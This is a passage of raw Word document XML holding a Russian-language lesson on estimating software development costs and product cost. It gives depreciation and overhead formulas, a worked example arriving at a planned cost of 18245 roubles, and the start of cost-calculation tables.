          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - балансовая стоимость вычислительной техники (ВТ),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>256 - среднее количество рабочих дней в году</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - объем машинных ресурсов для разработки ПО (дней).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для расчета амортизации могут использоваться и другие методы, разрешенные Положением по бухгалтерскому учету.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Прочие производственные затраты включают затраты на техническое обслуживание и ремонт ВТ, расходные материалы, аренду помещений и определяются по формуле</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1032150" cy="363250"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27255" name="Рисунок 388" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image014.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId460" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1031672" cy="363082"/>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где:</w:t>
      </w:r>
      <w:r w:rsidR="00BE7B15" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Н</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>пр</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - процент прочих производственных затрат от первоначальной стоимости ВТ,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Н</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>пр</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (3¸4)%.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Пример расчета плановой себестоимости ПО информационно справочной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Примем среднемесячную заработную плату разработчика равной </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>З</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 1500 р. и балансовую стоимость ВТ Ц</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">ВТ </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>= 15000 р. и Н</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">А </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=12% Ранее в таб.2.6 были определены длительность разработки t</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> =150 дн. Если объем машинных ресурсов 100 дн., то</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1874550" cy="337589"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27254" name="Рисунок 443" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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3" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image015.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId461" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1874666" cy="337610"/>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noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1730550" cy="366933"/>
            <wp:effectExtent l="19050" t="0" r="3000" b="0"/>
            <wp:docPr id="27247" name="Рисунок 444" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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4" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image016.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId462" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1731339" cy="367100"/>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noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1622550" cy="310604"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27246" name="Рисунок 445" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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5" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image017.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId463" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1621799" cy="310460"/>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Плановая себестоимость составит при</w:t>
      </w:r>
      <w:r w:rsidR="00BE7B15" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>К</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0,2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С = (14267 + 703 + 234,4)(1+0,2) = 18245 р.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расчет себестоимости производства товаров и оказания услуг осуществляется на основе эксплуатационного бюджета (см. Практическое занятие №</w:t>
      </w:r>
      <w:r w:rsidR="00BE7B15" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эксплуатационные (текущие) затраты разделены на две группы: переменные и постоянные затраты. К переменным затратам относятся те виды затрат, общая сумма которых за учетный период напрямую зависит от количества продукции, выпускаемой в данном периоде. Величина переменных затрат на единицу продукции остается неизменной.</w:t>
      </w:r>
      <w:r w:rsidR="00D84D30" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Общая сумма постоянных затрат за учетный период не зависит от количества выпускаемой продукции, она принимается неизменной. Величина постоянных затрат в расчете на единицу продукции снижается по мере увеличения выпуска продукции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расчет эксплуатационных затрат основан на определении себестоимости продукции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Различают себестоимость годового выпуска продукции и себестоимость единицы изделия.</w:t>
      </w:r>
      <w:r w:rsidR="00D84D30" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Себестоимость выпуска продукции определяется величиной текущих затрат на производство и реализацию продукции.</w:t>
      </w:r>
      <w:r w:rsidR="00D84D30" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Виды затрат включают полный перечень эксплуатационных (текущих) затрат действующего производства. На ранних стадиях создания новых изделий такой бюджет достаточно сложно спрогнозировать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Себестоимость единицы изделия прогнозируется различными методами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При отсутствии необходимых данных следует использовать приближенные методы расчета себестоимости изделия, например, метод укрупненной нормативной калькуляции или метод удельных весов.</w:t>
      </w:r>
      <w:r w:rsidR="00D84D30" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Метод укрупненной нормативной калькуляции предполагает определение себестоимости изделия на основе расчета</w:t>
      </w:r>
      <w:r w:rsidR="00D84D30" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>основных статей: материальных затрат, основной и дополнительной заработной платы, отчислений на социальные нужды и накладные расходы (табл.7).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 7</w:t>
      </w:r>
      <w:r w:rsidR="00E73975" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Калькуляция себестоимости изделия</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="8921" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7442"/>
        <w:gridCol w:w="1479"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00137383">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Статьи затрат</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Затраты на единицу, руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00137383">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">I. Переменные затраты </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1.Материальные затраты </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2.Основная заработная плата производственных рабочих </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3.Дополнительная заработная плата производственных рабочих </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">4.Отчисления на социальные нужды </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00617AC0" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>II</w:t>
            </w:r>
            <w:r w:rsidR="00BE7B15" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. Постоянные затраты </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>5.Накладные расходы, включая амортизацию</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Итого С</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>п</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Затраты на материалы и комплектующие изделия определяются по нормам расхода и действующим ценам за вычетом стоимости отходов (табл. 8 и 9).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 8</w:t>
      </w:r>
      <w:r w:rsidR="00E73975" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расчет стоимости основных материалов</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="8984" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1715"/>
        <w:gridCol w:w="2013"/>
        <w:gridCol w:w="1611"/>
        <w:gridCol w:w="1631"/>
        <w:gridCol w:w="2014"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidTr="00D84D30">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
